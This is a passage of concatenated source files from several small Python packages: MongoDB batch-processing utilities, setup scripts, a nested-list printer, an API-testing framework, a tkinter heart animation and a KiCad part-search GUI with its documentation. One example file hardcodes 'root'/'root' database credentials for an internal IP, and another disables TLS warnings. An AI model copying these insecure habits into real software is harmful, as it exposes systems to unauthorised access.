with open(file_name, 'r') as f:
index = -1
while True:
_id = f.readlines()[index].strip()
if len(_id) == 24:
return _id
data_fix_logger(f"Get the {-index} th _id error; Current _id: {_id}")
index -= 1
def get_q_size(service):
res = requests.get(service).json()
if res and res.get('data'):
return res.get('data').get('queueSize')
def find_documents(conn, data_base, collection, query, projection, sort_key="_id", sort_value=pymongo.ASCENDING, limits=0):
# 默认根据_id 升序排列,不限制返回的结果数量
_docs = conn[data_base][collection].find(query, projection).sort(sort_key, sort_value).limit(limits)
# 将结果集放到一个 list 中,方便计数
docs = [item for item in _docs]
return docs
def core_logic_example(conn, document, is_sandbox):
"""
核心处理逻辑样例,调用者自己实现。
【注意】必须有且仅有这三个参数
:param conn:
:param document:
:param is_sandbox:
:return:
"""
pass
def data_fix_main(uri, db, collection, more_filter, projections, core_logic, starts='', end_id='', quit_limit=0, limits=500, is_sandbox=True):
"""
:param uri: MongoDB 的账号信息
:param db: MongoDB 库名
:param collection: MongoDB 表名
:param more_filter: 查询 filter
:param projections: 查询 projection
:param core_logic: 核心逻辑,需调用者自己实现一个方法,且这个方法有且只能有两个参数,分别是 MongoDB 连接对象,和查出来的 document
:param starts: 起始 _id , 可以不提供
:param end_id: 终点 _id , 可以不提供
:param quit_limit: 处理 document 的数量限制,达到后程序结束,用于定量测试程序的运行;默认为0, 不做限制
:param limits: MongoDB 每次查询返回文档的限制,默认为 500
:param is_sandbox: 是否是测试状态,默认是 True
:return:
"""
start_id = ''
current_id = ''
exception_count = 0
has_query_count = 0
has_read_id_count = 0
conn = MongoClient(uri)
current_file_name = os.path.basename(sys.argv[0])[:-3]
# 如果存在断点文件,先复制保存一份,再继续使用该文件,防止发生错误,无法从之前的断点继续
old_logger_file = f"{current_file_name}_has_read_{collection}_ids.log"
if os.path.exists(old_logger_file):
try:
log_date = str(datetime.now().date())
log_time = str(datetime.now().time())[:-7]
bak_up_file_time = (log_date + '_' + log_time).replace('-', '_').replace(':', '_')
shutil.copy(old_logger_file, f"{current_file_name}_has_read_{collection}_ids_{bak_up_file_time}.log")
start_id = get_last_id(old_logger_file)
except Exception as e:
msg = str(e) + ",trace:" + traceback.format_exc()
data_fix_logger(f"Failed to get last id, exit! Error Msg {msg}.")
sys.exit()
# 读取数据库中的第一条 _id
if not start_id:
one_doc = conn[db][collection].find(more_filter, projection={"_id": 1}).sort("_id", pymongo.ASCENDING)
start_id = one_doc[0]["_id"]
data_fix_logger(str(start_id), fl_name=f'_has_read_{collection}_ids', mode='w', need_time=False)
query = {"_id": {"$gte": bson.ObjectId(start_id)}}
# 传入起点,则以传入的 objectId 为起点,否则以库中查询的第一条或者读取本地文件。
if starts:
query = {"_id": {"$gte": bson.ObjectId(starts)}}
if more_filter:
query.update(more_filter)
# 捕获异常20 次,则退出检查
while exception_count < 20:
has_query_count += 1
docs = find_documents(conn, db, collection, query, projections, "_id", pymongo.ASCENDING, limits)
fl = "_query_db_counts"
log_msg = f"****** Has queried {collection}: {has_query_count}*{limits}={has_query_count * limits} documents. *******"
data_fix_logger(log_msg, fl_name=fl, mode="w")
try:
# 查询结果为空,直接退出
if not docs:
data_fix_logger(f"Empty doc, exit! Last _id is: {current_id}.")
return
for doc in docs:
has_read_id_count += 1
current_id = _id = doc.get("_id")
query["_id"] = {"$gt": current_id}
data_fix_logger(str(current_id), fl_name=f'_has_read_{collection}_ids', mode='w', need_time=False)
# 给定退出限制, 达到限制的额时候,退出程序;
# 不给 quit_limit 传递值的时候,则不会在这里判断
if quit_limit and has_read_id_count > quit_limit:
data_fix_logger(f"Get end point, and mission is over! Last _id is: {current_id}.")
sys.exit()
# 程序退出条件 2
if end_id and (current_id > end_id):
data_fix_logger(f"Get end point, and mission is over! Last _id is: {current_id}.")
sys.exit() # 程序退出
# 核心处理逻辑
core_logic(conn, doc, is_sandbox)
except Exception as e:
query["_id"] = {"$gt": current_id} # 新的query
data_fix_logger(f'Get error, exception msg is {str(e) + ",trace:" + traceback.format_exc()}, current _id is: {current_id}.')
exception_count += 1
data_fix_logger(f"Catch exception 20 times, mission is over. Last _id is: {current_id}.")
def generate_gem_ts(uri, db, collection, more_filter, projections, core_logic, start_id='', end_id='', service_address='', q_size_limit=0, limits=500, need_stream_process=False):
"""
:param uri: mongoDB 地址
:param db: mongoDB 库名
:param collection: mongoDB 表名
:param more_filter: 其他 query
:param projections: projection
:param core_logic: 自定义核心处理逻辑
:param start_id: 自定义查询起点,必须是 MongoDB 的 ObjectId
:param end_id: 自定义查询终点,必须是 MongoDB 的 ObjectId
:param service_address: 可以指定队列地址,用来查询队列大小
:param q_size_limit: 可以指定队列大小,当大于此值时,会暂停查询
:param limits: 查询 MongoDB 的 limit
:param need_stream_process: 是否需要流处理,true 的话,则由核心处理逻辑处理每次查询出来的所有记录;默认为 false,逐条处理
:return:
"""
query = {}
current_id = ''
exception_count = 0
has_query_count = 0
has_read_id_count = 0
if isinstance(uri, str):
conn = MongoClient(uri)
elif isinstance(uri, pymongo.mongo_client.MongoClient):
conn = uri
else:
data_fix_logger(f'uri 类型错误,系统退出。')
sys.exit('uri 类型错误')
# 传入起点,则以传入的 objectId 为起点,否则以库中查询的第一条或者读取本地文件。
if start_id:
query = {"_id": {"$gte": bson.ObjectId(start_id)}}
if more_filter:
query.update(more_filter)
# 捕获异常20 次,则退出检查
while exception_count < 20:
# 如果需要根据队列堆积的量进行判断
if service_address and q_size_limit:
while 1:
q_size = int(get_q_size(service_address))
if q_size > q_size_limit:
# 十分钟一轮
data_fix_logger(f'queue size is greater than {q_size_limit}, sleep ten minus, queue size: {q_size}')
for i in range(30):
time.sleep(20)
# 为了保持链接, 20 秒查询一次
conn.enterprise.Counters.find_one({'seq': 736564644})
else:
break
has_query_count += 1
docs = find_documents(conn, db, collection, query, projections, "_id", pymongo.ASCENDING, limits)
fl = "_query_db_counts"
log_msg = f"****** Has queried {collection} with {query}: {has_query_count}*{limits}={has_query_count * limits} documents. *******"
data_fix_logger(log_msg, fl_name=fl, mode="w")
try:
# 查询结果为空,直接退出
if not docs:
data_fix_logger(f"Empty doc, exit! Last _id is: {current_id}.")
return
# 需要将所有 docs 一起处理
if need_stream_process:
current_id = _id = docs[-1].get("_id")
query["_id"] = {"$gt": current_id}
# 防止杀死进程的时候,这一轮没有执行完毕,下一次执行的时候会丢失数据
data_fix_logger(str(docs[0].get("_id")), fl_name=f'_has_read_{collection}_ids', mode='w', need_time=False)
core_logic(conn, docs)
# 程序退出条件
if end_id:
real_end_id = None
if isinstance(end_id, str):
real_end_id = bson.ObjectId(end_id)
elif isinstance(end_id, bson.ObjectId):
real_end_id = end_id
if current_id > real_end_id:
data_fix_logger(f"Get end point, and mission is over! Last _id is: {current_id}.")
sys.exit()
continue
for doc in docs:
has_read_id_count += 1
current_id = _id = doc.get("_id")
query["_id"] = {"$gt": current_id}
data_fix_logger(str(current_id), fl_name=f'_has_read_{collection}_ids', mode='w', need_time=False)
# 程序退出条件
if end_id:
real_end_id = None
if isinstance(end_id, str):
real_end_id = bson.ObjectId(end_id)
elif isinstance(end_id, bson.ObjectId):
real_end_id = end_id
if current_id > real_end_id:
data_fix_logger(f"Get end point, and mission is over! Last _id is: {current_id}.")
sys.exit()
# 核心处理逻辑
core_logic(conn, doc)
except Exception as e:
query["_id"] = {"$gt": current_id} # 新的query
data_fix_logger(f'Get error, exception msg is {str(e) + ",trace:" + traceback.format_exc()}, current _id is: {current_id}.')
exception_count += 1
data_fix_logger(f"Catch exception 20 times, mission is over. Last _id is: {current_id}.")
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/data_fix.py
|
data_fix.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2020/3/27 16:30
# @Author: "John"
def read_big_file(fl, newline="{|}", fl_limit=4096):
"""
:return iterator
:param fl: file name
:param newline:
:param fl_limit:
:return:
"""
buf = ""
while True:
while newline in buf:
pos = buf.index(newline)
yield buf[:pos]
buf = buf[pos + len(newline):]
chunk = fl.read(fl_limit)
if not chunk:
# 说明已经读到了文件结尾
yield buf
break
buf += chunk
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/read_file.py
|
read_file.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019/11/14 15:08
# @Author: "John"
import json
import uuid
import requests
import urllib3
urllib3.disable_warnings()
def sync_open_search(pid, db, collection, service_address, topic='TweOpensearch', is_sandbox=True):
"""
:param pid:
:param db:
:param collection:
:param service_address:
:param topic: default for TweOpensearch
:param is_sandbox: default for sandbox,not sync openSearch
:return:
"""
if is_sandbox:
print(f"It is a test, not sync openSearch: pid:{pid}。")
return
headers = {"Content-type": "application/json; charset=UTF-8", "Accept": "application/json"}
msg = {
"topic": topic,
"traceID": str(uuid.uuid1()).replace('-', ''),
"msgData": {
"mongodb": db,
"collection": collection,
"primaryKey": "PID",
"primaryValue": pid.strip(),
"isNew": 0
}
}
resp = requests.post(service_address, headers=headers, data=json.dumps(msg))
if resp.json().get("success"):
return 1
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/sync_open_search.py
|
sync_open_search.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019\10\8 0008 23:44
# @Author: "John"
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/__init__.py
|
__init__.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2020/2/29 18:02
# @Author: "John"
import json
def beautiful_output_dict(d, encoding='utf-8', indent=4, sort_keys=True, ensure_ascii=False):
"""
将 Python 的字典, 以展开的方式输出
:param d: 要处理的字典
:param encoding: 编码方式,默认 utf-8
:param indent: 缩进
:param sort_keys: 根据字典的 key 进行排序
:param ensure_ascii:
:return:
"""
return json.dumps(json.loads(d, encoding=encoding), sort_keys=sort_keys, indent=indent, ensure_ascii=ensure_ascii)
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/beautiful_output_dict.py
|
beautiful_output_dict.py
|
from setuptools import setup
setup(name='zy',
version='0.1.05',
description='zy 子永的包',
author='zy-only',
author_email='ui829475@126.com',
url='https://gitee.com/only_zy/python_small_project',
install_requires=["numpy", "xlwt"],
license='zy-wkr',
packages=['zy'],
zip_safe=False)
|
zy
|
/zy-0.1.5.tar.gz/zy-0.1.5/setup.py
|
setup.py
|
from distutils.core import setup
setup(
name="zy1221_nester",
version="1.1.0",
py_modules=['zy1221_nester'],
author='zypython',
author_email='1083060476@qq.com',
url='http://www.headfirstlabs.com',
description='A simple printer of nested lists',
)
|
zy1221_nester
|
/zy1221_nester-1.1.0.zip/zy1221_nester-1.1.0/setup.py
|
setup.py
|
def print_lol(the_list,level):
for each_item in the_list:
if isinstance(each_item,list):
print_lol(each_item,level+1)
else:
for tab_stop in range(level):
print("\t",end='')
print(each_item)
|
zy1221_nester
|
/zy1221_nester-1.1.0.zip/zy1221_nester-1.1.0/zy1221_nester.py
|
zy1221_nester.py
|
from setuptools import setup,find_packages
setup(
name="zyb-message",
version="0.1",
author="zyb",
description = "张奕标,陈兴金",
packages = find_packages("zyb"),
package_dir = {"":"zyb"},
package_data = {
"":[".txt",".info","*.properties",".py"],
"":["data/*.*"],
},
exclude = ["*.test","*.test.*","test.*","test"]
)
|
zyb-message
|
/zyb-message-0.1.tar.gz/zyb-message-0.1/setup.py
|
setup.py
|
def get_info():
return "zyb_handsome_boy"
|
zyb-message
|
/zyb-message-0.1.tar.gz/zyb-message-0.1/zyb/handsome/boy/message.py
|
message.py
|
"""此模块用来输出嵌套列表,共三个参数,第一个是列表,第二个是是否缩进,第三个是缩进多少个制表符,其中后两个参数是可选的"""
def print_list(aList,is_sj=False,level=0):
"""遇到普通的元素就打印,遇到列表元素就递归调用"""
for oneElement in aList:
if isinstance(oneElement,list):
print_list(oneElement,is_sj,level+1)#递归
else:
if is_sj:
for number in range(level):
print("\t",end='')
print(oneElement)
|
zyb-naster
|
/zyb-naster-1.2.0.tar.gz/zyb-naster-1.2.0/print_list.py
|
print_list.py
|
from distutils.core import setup#导入setup函数
setup(
#setup函数的参数
name='zyb-naster', #发布的名字
version='1.2.0', #版本
py_modules=['print_list'], #模块的元数据(模块的名字)
author='zyb', #作者
author_email='yabeizhao@126.com',#作者邮箱
url='www.baidu.com', #网站
description='输出列表', #介绍
)
|
zyb-naster
|
/zyb-naster-1.2.0.tar.gz/zyb-naster-1.2.0/setup.py
|
setup.py
|
# zybats
# ZYBATS
|
zybats
|
/zybats-2.0.2.6.tar.gz/zybats-2.0.2.6/README.md
|
README.md
|
#encoding: utf-8
import io
import os
import sys
from shutil import rmtree
from setuptools import Command, find_packages, setup
about = {}
here = os.path.abspath(os.path.dirname(__file__))
with io.open(os.path.join(here, 'zybats', '__about__.py'), encoding='utf-8') as f:
exec(f.read(), about)
with io.open("README.md", encoding='utf-8') as f:
long_description = f.read()
install_requires = [
"requests",
"PyYAML",
"Jinja2",
"har2case",
"colorama",
"colorlog",
"requests_toolbelt",
"pika",
"redis==2.10.6",
"redis-py-cluster",
"xlrd",
"protobuf",
"simplejson",
"pymysql",
"PyYAML",
"Flask",
"MarkupSafe",
"certifi",
"chardet",
"idna",
"urllib3"
]
class UploadCommand(Command):
""" Build and publish this package.
Support setup.py upload. Copied from requests_html.
"""
user_options = []
@staticmethod
def status(s):
"""Prints things in green color."""
print("\033[0;32m{0}\033[0m".format(s))
def initialize_options(self):
""" override
"""
pass
def finalize_options(self):
""" override
"""
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to PyPi via Twine…')
os.system('twine upload dist/*')
self.status('Publishing git tags…')
os.system('git tag v{0}'.format(about['__version__']))
os.system('git push --tags')
sys.exit()
setup(
name=about['__title__'],
version=about['__version__'],
description=about['__description__'],
long_description=long_description,
long_description_content_type='text/markdown',
author=about['__author__'],
author_email=about['__author_email__'],
url=about['__url__'],
license=about['__license__'],
python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, <4',
packages=find_packages(exclude=["tests", "testsexample2", "testseg2", "tests.*"]),
package_data={
'': ["README.md"],
'zybats': ["templates/*"],
'testsexample': ["*/*"],
},
keywords='HTTP api test requests locust',
install_requires=install_requires,
extras_require={},
classifiers=[
"Development Status :: 3 - Alpha",
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7'
],
entry_points={
'console_scripts': [
'ate=zybats.cli:main_zats',
'zybats=zybats.cli:main_zats',
'zats=zybats.cli:main_zats',
'locusts=zybats.cli:main_locust'
]
},
# $ setup.py upload support.
cmdclass={
'upload': UploadCommand
}
)
|
zybats
|
/zybats-2.0.2.6.tar.gz/zybats-2.0.2.6/setup.py
|
setup.py
|
from zybats.ext.appext.dbUtil import Db
from zybats.ext.appext.redisUtil import RedisSingleNode
import os
URL = os.environ['url']
def get_base_url():
url = os.environ['url']
return url
def query_mysql_one_result(sql_str):
ip = "192.168.240.197"
port = 8888
user_name = "root"
password = "root"
db_name = "adx_admin"
dbClient = Db(ip, port, user_name, password, db_name)
result = dbClient.select(sql_str)
return result[0][0]
def get_redis_str_value(key):
ip = "192.168.240.98"
port = 6379
client = RedisSingleNode(ip, port)
v = client.get(key)
return v.decode()
def show_request_function(request_body, replace_app_id):
print("You can do something here! for example:")
request_body["json"]["appId"] = replace_app_id
print("Replaced request body is:", request_body)
def show_response_function(response_body, id):
print("You can do something here! for example:")
print(response_body)
if __name__ =='__main__':
aaa = "aaa"
|
zybats
|
/zybats-2.0.2.6.tar.gz/zybats-2.0.2.6/testsexample/atsfunc.py
|
atsfunc.py
|
# 安装
```python
pip install zyc_love #直接最新版本即可
```
# 使用
```python
from love_code.love import run
if __name__=="__main__":
run()
```
|
zyc-love
|
/zyc_love-1.0.1.tar.gz/zyc_love-1.0.1/README.md
|
README.md
|
from setuptools import setup, find_packages
with open('README.md','r',encoding='utf-8') as f:
long_descriptions = f.read()
setup (
name="zyc_love",
version="1.0.1",
author="renaissance",
author_email="renaissance3310@163.com",
description=" Code of Love ",
long_description = long_descriptions,
long_description_content_type="text/markdown",
url="https://github.com/renaissancezyc/zyc-love",
packages=find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
)
|
zyc-love
|
/zyc_love-1.0.1.tar.gz/zyc_love-1.0.1/setup.py
|
setup.py
|
import random
from math import sin, cos, pi, log
from tkinter import *
import ctypes
user32 = ctypes.windll.user32
CANVAS_WIDTH = user32.GetSystemMetrics(0) # 画布的宽
CANVAS_HEIGHT = user32.GetSystemMetrics(1) # 画布的高
CANVAS_CENTER_X = CANVAS_WIDTH / 2 # 画布中心的X轴坐标
CANVAS_CENTER_Y = CANVAS_HEIGHT / 2 # 画布中心的Y轴坐标
IMAGE_ENLARGE = 11 # 放大比例
HEART_COLOR = "#ff2121" # 心的颜色,这个是中国红
def heart_function(t, shrink_ratio: float = IMAGE_ENLARGE):
"""
“爱心函数生成器”
:param shrink_ratio: 放大比例
:param t: 参数
:return: 坐标
"""
# 基础函数
x = 16 * (sin(t) ** 3)
y = -(13 * cos(t) - 5 * cos(2 * t) - 2 * cos(3 * t) - cos(4 * t))
# 放大
x *= shrink_ratio
y *= shrink_ratio
# 移到画布中央
x += CANVAS_CENTER_X
y += CANVAS_CENTER_Y
return int(x), int(y)
def scatter_inside(x, y, beta=0.15):
"""
随机内部扩散
:param x: 原x
:param y: 原y
:param beta: 强度
:return: 新坐标
"""
ratio_x = - beta * log(random.random())
ratio_y = - beta * log(random.random())
dx = ratio_x * (x - CANVAS_CENTER_X)
dy = ratio_y * (y - CANVAS_CENTER_Y)
return x - dx, y - dy
def shrink(x, y, ratio):
"""
抖动
:param x: 原x
:param y: 原y
:param ratio: 比例
:return: 新坐标
"""
force = -1 / (((x - CANVAS_CENTER_X) ** 2 + (y - CANVAS_CENTER_Y) ** 2) ** 0.6) # 这个参数...
dx = ratio * force * (x - CANVAS_CENTER_X)
dy = ratio * force * (y - CANVAS_CENTER_Y)
return x - dx, y - dy
def curve(p):
"""
自定义曲线函数,调整跳动周期
:param p: 参数
:return: 正弦
"""
# 可以尝试换其他的动态函数,达到更有力量的效果(贝塞尔?)
return 2 * (2 * sin(4 * p)) / (2 * pi)
class Heart:
"""
爱心类
"""
def __init__(self, generate_frame=20):
self._points = set() # 原始爱心坐标集合
self._edge_diffusion_points = set() # 边缘扩散效果点坐标集合
self._center_diffusion_points = set() # 中心扩散效果点坐标集合
self.all_points = {} # 每帧动态点坐标
self.build(2000)
self.random_halo = 1000
self.generate_frame = generate_frame
for frame in range(generate_frame):
self.calc(frame)
def build(self, number):
# 爱心
for _ in range(number):
t = random.uniform(0, 2 * pi) # 随机不到的地方造成爱心有缺口
x, y = heart_function(t)
self._points.add((x, y))
# 爱心内扩散
for _x, _y in list(self._points):
for _ in range(3):
x, y = scatter_inside(_x, _y, 0.05)
self._edge_diffusion_points.add((x, y))
# 爱心内再次扩散
point_list = list(self._points)
for _ in range(4000):
x, y = random.choice(point_list)
x, y = scatter_inside(x, y, 0.17)
self._center_diffusion_points.add((x, y))
@staticmethod
def calc_position(x, y, ratio):
# 调整缩放比例
force = 1 / (((x - CANVAS_CENTER_X) ** 2 + (y - CANVAS_CENTER_Y) ** 2) ** 0.520) # 魔法参数
dx = ratio * force * (x - CANVAS_CENTER_X) + random.randint(-1, 1)
dy = ratio * force * (y - CANVAS_CENTER_Y) + random.randint(-1, 1)
return x - dx, y - dy
def calc(self, generate_frame):
ratio = 10 * curve(generate_frame / 10 * pi) # 圆滑的周期的缩放比例
halo_radius = int(4 + 6 * (1 + curve(generate_frame / 10 * pi)))
halo_number = int(3000 + 4000 * abs(curve(generate_frame / 10 * pi) ** 2))
all_points = []
# 光环
heart_halo_point = set() # 光环的点坐标集合
for _ in range(halo_number):
t = random.uniform(0, 2 * pi) # 随机不到的地方造成爱心有缺口
x, y = heart_function(t, shrink_ratio=11.6) # 魔法参数
x, y = shrink(x, y, halo_radius)
if (x, y) not in heart_halo_point:
# 处理新的点
heart_halo_point.add((x, y))
x += random.randint(-14, 14)
y += random.randint(-14, 14)
size = random.choice((1, 2, 2))
all_points.append((x, y, size))
# 轮廓
for x, y in self._points:
x, y = self.calc_position(x, y, ratio)
size = random.randint(1, 3)
all_points.append((x, y, size))
# 内容
for x, y in self._edge_diffusion_points:
x, y = self.calc_position(x, y, ratio)
size = random.randint(1, 2)
all_points.append((x, y, size))
for x, y in self._center_diffusion_points:
x, y = self.calc_position(x, y, ratio)
size = random.randint(1, 2)
all_points.append((x, y, size))
self.all_points[generate_frame] = all_points
def render(self, render_canvas, render_frame):
for x, y, size in self.all_points[render_frame % self.generate_frame]:
render_canvas.create_rectangle(x, y, x + size, y + size, width=0, fill=HEART_COLOR)
def draw(main: Tk, render_canvas: Canvas, render_heart: Heart, render_frame=0):
render_canvas.delete('all')
render_heart.render(render_canvas, render_frame)
main.after(160, draw, main, render_canvas, render_heart, render_frame + 1)
def run():
root = Tk() # 一个Tk
root.attributes('-fullscreen' , True) # 全屏
root.attributes('-alpha' , 0.9) # 透明度
canvas = Canvas(root , bg='black' , height=CANVAS_HEIGHT , width=CANVAS_WIDTH)
canvas.pack()
heart = Heart() # 心
draw(root , canvas , heart) # 开始画画~
root.mainloop()
|
zyc-love
|
/zyc_love-1.0.1.tar.gz/zyc_love-1.0.1/love_code/love.py
|
love.py
|
print('这里是周奕呈编写的爱心代码')
|
zyc-love
|
/zyc_love-1.0.1.tar.gz/zyc_love-1.0.1/love_code/__init__.py
|
__init__.py
|
=======
History
=======
1.0.0 (2021-09-16)
------------------
* Disabled creation of SKiDL logging and ERC files.
* Decided this tool was mature to the point it could be called 1.0.0.
0.4.0 (2020-09-20)
------------------
* Fixed infinite recursion caused by search that returns an entire list of invalid footprints (issue #2).
0.3.0 (2020-06-07)
------------------
* Fixed copy-paste part/footprint errors caused by clipboard already being open.
0.2.0 (2020-04-28)
------------------
* Replaced sorting function deleted from SKiDL.
* Updated some Grid definitions for wxpython 4.0.
0.1.0 (2019-12-17)
------------------
* Extracted zyc utility from SKiDL repo and released separately on PyPi.
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/HISTORY.rst
|
HISTORY.rst
|
===
zyc
===
.. image:: https://img.shields.io/pypi/v/zyc.svg
:target: https://pypi.python.org/pypi/zyc
A GUI utility for searching and selecting parts and footprints for use with `SKiDL <https://pypi.org/project/skidl/>`_.
* Free software: MIT license
* Documentation: https://devbisme.github.io/zyc .
Features
--------
* Keyword search and selection of parts in KiCad libraries.
* Keyword search and selection of footprints in KiCad libraries.
* Copy-and-paste part instances into SKiDL code.
Credits
-------
This package was created with Cookiecutter_ and the `audreyr/cookiecutter-pypackage`_ project template.
.. _Cookiecutter: https://github.com/audreyr/cookiecutter
.. _`audreyr/cookiecutter-pypackage`: https://github.com/audreyr/cookiecutter-pypackage
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/README.rst
|
README.rst
|
.. highlight:: shell
============
Contributing
============
Contributions are welcome, and they are greatly appreciated! Every little bit
helps, and credit will always be given.
You can contribute in many ways:
Types of Contributions
----------------------
Report Bugs
~~~~~~~~~~~
Report bugs at https://github.com/devbisme/zyc/issues.
If you are reporting a bug, please include:
* Your operating system name and version.
* Any details about your local setup that might be helpful in troubleshooting.
* Detailed steps to reproduce the bug.
Fix Bugs
~~~~~~~~
Look through the GitHub issues for bugs. Anything tagged with "bug" and "help
wanted" is open to whoever wants to implement it.
Implement Features
~~~~~~~~~~~~~~~~~~
Look through the GitHub issues for features. Anything tagged with "enhancement"
and "help wanted" is open to whoever wants to implement it.
Write Documentation
~~~~~~~~~~~~~~~~~~~
zyc could always use more documentation, whether as part of the
official zyc docs, in docstrings, or even on the web in blog posts,
articles, and such.
Submit Feedback
~~~~~~~~~~~~~~~
The best way to send feedback is to file an issue at https://github.com/devbisme/zyc/issues.
If you are proposing a feature:
* Explain in detail how it would work.
* Keep the scope as narrow as possible, to make it easier to implement.
* Remember that this is a volunteer-driven project, and that contributions
are welcome :)
Get Started!
------------
Ready to contribute? Here's how to set up `zyc` for local development.
1. Fork the `zyc` repo on GitHub.
2. Clone your fork locally::
$ git clone git@github.com:your_name_here/zyc.git
3. Install your local copy into a virtualenv. Assuming you have virtualenvwrapper installed, this is how you set up your fork for local development::
$ mkvirtualenv zyc
$ cd zyc
$ python setup.py develop
4. Create a branch for local development::
$ git checkout -b name-of-your-bugfix-or-feature
Now you can make your changes locally.
5. Commit your changes and push your branch to GitHub::
$ git add .
$ git commit -m "Your detailed description of your changes."
$ git push origin name-of-your-bugfix-or-feature
6. Submit a pull request through the GitHub website.
Pull Request Guidelines
-----------------------
Before you submit a pull request, check that it meets these guidelines:
1. If the pull request adds functionality, the docs should be updated. Put
your new functionality into a function with a docstring, and add the
feature to the list in README.rst.
2. The pull request should work for Python 2.7 and >=3.5.
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/CONTRIBUTING.rst
|
CONTRIBUTING.rst
|
=======
Credits
=======
Development Lead
----------------
* Dave Vandenbout <devb@xess.com>
`Other Contributors <https://github.com/devbisme/zyc/graphs/contributors>`_
---------------------------------------------------------------------------
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/AUTHORS.rst
|
AUTHORS.rst
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
import sys
from setuptools import setup, find_packages
__author__ = "Dave Vandenbout"
__email__ = "devbisme@xess.com"
__version__ = "1.0.0"
if "sdist" in sys.argv[1:]:
with open("zyc/pckg_info.py", "w") as f:
for name in ["__version__", "__author__", "__email__"]:
f.write("{} = '{}'\n".format(name, locals()[name]))
with open("README.rst") as readme_file:
readme = readme_file.read()
with open("HISTORY.rst") as history_file:
history = history_file.read()
requirements = [
"skidl >= 0.0.27",
"kinparse >= 0.1.0",
'enum34; python_version < "3.0"',
"wxpython >= 4.0.7",
"pykicad",
]
setup_requirements = []
test_requirements = []
setup(
author=__author__,
author_email=__email__,
version=__version__,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Manufacturing",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)",
],
description="A GUI for searching and selecting parts and footprints for use in SKiDL.",
entry_points={"gui_scripts": ["zyc = zyc.zyc:main"]},
install_requires=requirements,
license="MIT license",
long_description=readme + "\n\n" + history,
include_package_data=True,
keywords="zyc",
name="zyc",
packages=find_packages(include=["zyc"]),
setup_requires=setup_requirements,
test_suite="tests",
tests_require=test_requirements,
url="https://github.com/devbisme/zyc",
zip_safe=False,
)
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/setup.py
|
setup.py
|
.. include:: ../CONTRIBUTING.rst
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/docs/contributing.rst
|
contributing.rst
|
Usage
============
Just enter `zyc` at the command line to bring up the GUI.

`zyc` has two, cooperating panes: a part is searched for and selected in the top pane, and then the
same is done for a footprint in the bottom pane. Then you can paste a SKiDL `Part(...)` instantiation
with the part and footprint into a code editing window.
To begin, start off by typing some search terms describing the part you want
into the upper text-entry box (1) and hit `RETURN` or click the `Search` button (2).

`zyc` will scan through all the available parts looking for your search terms in the library names and
the part names, aliases, descriptions, and keywords. (This initial search takes 20-30 seconds, but
any further searches are quick because the part data gets cached.)
The search terms can contain one or more text strings and/or regular expressions (REs).
Any matching parts are displayed in the Library/Part table (1).
Clicking on a row in the table (2) displays the part's description and keywords (3), datasheet hyperlink (4), and
I/O pin table (5) on the right-side of the pane.

Selecting a part also loads the footprint search text-entry box (6) with an initial set of search terms formed from
the part's list of recommended footprints plus the number of part pins.
You can edit these search terms and add more to modify the footprint search.
(Which is handy because, in this case, the number of pins is wrong since the pin list only contains
six entries but the actual number of pins is eight. So I'll just remove it.)
Then press the `Search` button (7) to scan through all the footprints for matching terms.
(As with parts, the initial footprint search takes 20-30 seconds but further searches are fast
because of caching.)
The footprints that match the search terms appear in the Library/Footprint table (1).
In this case, there is only one.
Selecting it makes the footprint description appear (2) as well as a drawing of the footprint (3).
(If a hyperlink for the package datasheet was available, that would show up as well.)

Once a part and footprint are selected, you can click on the `Copy` button in the upper panel (1)
to place a `Part(...)` instantiation on the clipboard.

Then you can go anywhere (such as your code editor) and paste the clipboard contents to get the part
instantiation:
```python
uc = Part(lib='MCU_Microchip_PIC10.lib', name='PIC10F202-IMC',
footprint='Package_DFN_QFN:DFN-8-1EP_2x3mm_P0.5mm_EP0.61x2.2mm')
```
If you check the `Tmplt` box (2) and then click the `Copy` button, a part template (instead of an instance)
gets placed on the clipboard and appears as follows:
```python
uc = Part(lib='MCU_Microchip_PIC10.lib', name='PIC10F202-IMC', dest=TEMPLATE,
footprint='Package_DFN_QFN:DFN-8-1EP_2x3mm_P0.5mm_EP0.61x2.2mm')
```
To make it easier to connect the pins, `zyc` lets you select the names from the pin list column (1).
Right-clicking on the table copies whatever is selected to the clipboard.

Then the pin names can be pasted into the code editor:
```python
uc = Part(lib='MCU_Microchip_PIC10.lib', name='PIC10F202-IMC',
footprint='Package_DFN_QFN:DFN-8-1EP_2x3mm_P0.5mm_EP0.61x2.2mm')
"VDD",
"GP2",
"GP1",
